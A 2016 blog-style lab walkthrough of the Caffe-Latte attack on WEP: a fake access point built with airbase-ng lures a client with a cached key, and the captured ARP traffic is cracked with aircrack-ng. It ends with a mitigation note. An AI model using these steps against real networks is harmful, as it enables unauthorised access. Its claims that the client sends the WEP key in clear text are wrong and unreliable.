Monday, October 17, 2016


3.3 - Caffe-Latte attack against WEP

- The Caffe-Latte attack takes advantage of the WEP's Message Modification's flaw. The most interesting characteristic of Caffe-Latte attack is that no AP is needed to perform it. Actually, the attacker takes the information used to crack the WEP key from packets sent by the victim trying to authenticate with the AP, although it is not present. The attacker "kali" will monitor the air finding clients sending probing messages. Then, a fake AP is set using Airbase-ng. When the client connects to the fake AP authentication messages are sent, and after association the DHCP request phase starts. Just at this point, the Caffe-Latte attack is launched by the attacker.

- To perform this attack, let's set the legitimate AP with SSID=prueba, and WEP with Shared Key Authentication:

The WEP key generated by the AP is A8925DC44A5432DE814CE109F9:

The victim "roch" is connected to the wireless network, so that it can have cached and stored the WEP key:

This attack is based on the fact that clients, just after being started, are usually configured to send probe messages for SSIDs that they have previoulsy connected. For instance, Windows clients cache and store WEP keys of previous connected networks. This option is known as Preferred Network List (PNL), consisting of a list of pre used networks. A very similar configuration is enabled for Linux. For instance, Debian pre used networks are stored under Network Connections option.

- Every time a client connects to the same AP, the Windows wireless manager automatically uses that stored key. This is done with the purpose of helping users, not being necessary to introduce the key every time the computer is turned on.

- However, from the security perspective, it can be considered a flaw. It can be checked at next screenshot, option "Connect automatically when this network is in range" is ticked:

- As said before, the WEP key is cached and stored by Windows clients:

- Because this attack does not require the client to be close to the legitimate AP, it means that the WEP key can be cracked just using the client isolated. To verify it the AP is going to be unplug during the whole practice, simulating that the AP is far away to the client.

- Now, given this scenario, let's start the attack form "kali". Using airbase-ng tool, a fake AP is created with the same SSID=prueba and an arbitrary MAC address like AA:AA:AA:AA:AA:AA. Of course, in a real attack, a less suspicious MAC address would be used:

It is important to notice the options used with the command airbase-ng:

                      - L = Caffe-Latte attack
                      - W 1 = WEP encryption

- Then, the client "roch" is started within an scenario where there is no legitimate AP turned on (remember that it has been unpluged). Wireshark detects the victim "roch" (Netgear wireless card interface with MAC 28:C6:8E:63:15:6B) desperately sending Broadcast messages looking for the legitimate "prueba" AP, which is actually unplug:

- The victim "roch" will not find the legitimate "prueba" AP, but the fake "prueba" AP created by the attacker "kali'.

Because there is no mutual authentication between client and AP, just the client authenticating with the AP, it won't be any problem for the assocciation process to success. In other words, the fake AP (the attacker) has got the role to decide or approve that the assocciation of the client cand be achieved. It is quite interesting that WEP allows any fake AP to perform an assocciation process without knowing the used key.

Once the client is connected to the fake AP, it will send out DHCP requests which will eventually timeout because the fake AP is not a DHCP server. Then, not receiving any dynamic IP, the client will start the so called Automatic Private IP Addressing (APIPA), which assigns to itself an IP like 169.254.x.x. After this auto configuration process, the client will send Gratuitous ARP broadcast packets with the purpose of announcing itself to the rest of the network.

- The attacker "kali"captures these Gratuitous ARP packets and modifies them using the Message Modification WEP flaw, converting them into ARP request packets for the client. The Message Modification WEP flaw allows to flip bits in a WEP encrypted packet, adjusting the ICV to make the packet valid.

- Then, the fake AP resends a few thousand of these spurious ARP request packets back into the wireless network. The client receives them and believes that someone is asking for its MAC address using ARP, replying back.

- When the victim "roch" replies, the packets include the WEP key, and they are captured by the attacker "kali". Once the attacker collects enough packets, aircrack-ng will be able to crack the WEP key.

- It is important to note that the attacker is able to run the attack without any knowledge of the WEP key.

- After 2 minutes since the attacker "kali" has created the fake AP, the victim "roch" is associated, and just immediately the Caffe-Latte attack is launched (see the last line) at 10:52:51:

With the purpose of collecting packets sent between the victim "roch" and the fake AP, airodump-ng writes to the file CaffeLatteWEP:

- The CaffeLatteWEP-01 file and its derivatives are created:

- After some minutes of gathering a large number of exchanged packets, aircrack-ng is used to obtain the WEP key A8925DC44A5432DE814CE109F9:

- Again, it is important to remember the most remarkable feature ot this attack, which differences it from other WEP attacks, and which gives its new great value: no legitimate AP has been used to perform the whole attack, no legitimate AP has been present in the viccinity. Just the isolated client, maybe roaming thousands of miles away from the attacked network, looking for a wireless connection sending to the air in clear text a copy of the cached and stored WEP key. So, unlike to other attacks against WEP encryption, the attacker does not need to be in the viccinity of any AP, which converts Caffe-Latte attack into a very powerful attack.

- No need to say, to prevent this attack, the solution would consist of removing all networks from the Preferred Network List (PNL) whenever the client is roaming. However, almost nobody does it, due to the fact of the inconvenience created every time the user wants to join a network, because he would need to introduce the WEP key manually, usually a very long hexadecimal key difficult to remember.